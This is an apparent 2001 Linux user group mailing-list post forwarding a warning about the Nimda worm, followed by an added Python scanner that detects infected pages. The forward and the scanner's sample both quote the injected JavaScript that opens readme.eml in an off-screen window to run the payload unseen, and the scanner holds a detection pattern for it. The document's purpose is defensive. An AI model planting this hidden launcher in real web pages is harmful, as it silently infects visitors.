[lug] Fwd: New worm on the loose (Code Rainbow?)
Nate Duehr
nate at natetech.com
Tue Sep 18 12:43:45 MDT 2001
Must... Control.... Fist..OF..DEATH!
:-)
On Tue, Sep 18, 2001 at 12:41:48PM -0600, John Starkey wrote:
> From a web dev list.
>
> ===================================================
>
> Even worse, this virus can be spread to users who simply surf to a web page
> on an infected server. A javascript is added to web pages served on infected
> servers, and this script launches a readme.eml file, which Internet Explorer
> then opens and executes.
>
> The code appended to infected web pages is:
>
> <!-- BEGIN
>
> <html><script language="JavaScript">window.open("readme.eml", null,
> "resizable=no,top=6000,left=6000 ")</script></html>
>
> -->
>
> Readme.eml contains the virus payload, and is launched via Javascript in a
> window at X6000 Y6000, i.e., way off your screen so you can't see it. A
> quick, unproven workaround seems to be to associate .eml files with Notepad.
> IE still opens the new window, however, and I'm not certain if this is
> enough to infect.
>
> Note that an infected web server will have a "readme.eml" file on the server
> in root. That's a good way to check if your NT server is infected, I would
> think.
>
> This server worm uses exploits that have had patches for some time now. If
> you run Windows, you need to go to windowsupdate.com to make sure you are up
> to date with patches.
>
> =====================================================
> _______________________________________________
> Web Page: http://lug.boulder.co.us
> Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug
--
Nate Duehr <nate at natetech.com>
GPG Key fingerprint = DCAF 2B9D CC9B 96FA 7A6D AAF4 2D61 77C5 7ECE C1D2
Public Key available upon request, or at wwwkeys.pgp.net and others.
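As an added example (not part of the forwarded message or the list archive), a small Python scanner that implements the two checks the forward describes from the defender's side: flagging pages that carry the appended off-screen readme.eml launcher, and checking for a readme.eml in the web root. The sample pages are constructed, and the set of file extensions scanned is an assumption.

```python
import os
import re

# Pattern for the script the forwarded message says infected servers append to
# served pages: a window.open() of readme.eml pushed far off-screen. Whitespace
# is allowed to vary; the .eml target plus a four-or-more-digit top/left offset
# is the distinctive part.
INJECTED_LAUNCHER = re.compile(
    r'window\.open\(\s*"[^"]*readme\.eml"\s*,\s*null\s*,\s*"'
    r'[^"]*(?:top|left)=\d{4,}[^"]*"\s*\)',
    re.IGNORECASE,
)

# Extensions to inspect (assumption: the usual static/ASP pages an NT web root held).
PAGE_SUFFIXES = (".htm", ".html", ".asp")


def find_injected_launcher(html):
    """Return (offset, snippet) for every appended launcher found in one page."""
    return [(m.start(), m.group(0)) for m in INJECTED_LAUNCHER.finditer(html)]


def scan_webroot(root):
    """Walk a web root and return pages carrying the launcher plus the root check.

    Results come back as a dict so a caller can act on them rather than parse
    printed output: {"hits": [(path, offset, snippet), ...],
                     "readme_eml_in_root": bool}.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(PAGE_SUFFIXES):
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    for offset, snippet in find_injected_launcher(fh.read()):
                        hits.append((path, offset, snippet))
    readme_in_root = os.path.isfile(os.path.join(root, "readme.eml"))
    return {"hits": hits, "readme_eml_in_root": readme_in_root}


# Constructed sample: a normal page with the quoted script appended after </html>.
SAMPLE_INFECTED = (
    "<html><body><h1>Welcome</h1></body></html>\n"
    '<html><script language="JavaScript">window.open("readme.eml", null,\n'
    '"resizable=no,top=6000,left=6000 ")</script></html>\n'
)
# Constructed sample: a benign pop-up that must not be flagged.
SAMPLE_CLEAN = "<html><body><script>window.open('/help.html')</script></body></html>"

if __name__ == "__main__":
    print(find_injected_launcher(SAMPLE_INFECTED))  # one hit
    print(find_injected_launcher(SAMPLE_CLEAN))     # []
```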